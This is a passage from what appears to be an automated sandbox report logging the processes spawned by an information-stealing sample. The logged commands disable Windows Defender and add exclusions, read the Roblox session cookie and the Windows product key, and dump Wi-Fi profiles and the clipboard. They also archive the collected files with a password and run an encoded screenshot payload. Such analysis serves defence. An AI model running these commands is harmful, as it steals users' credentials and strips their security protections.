MAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAI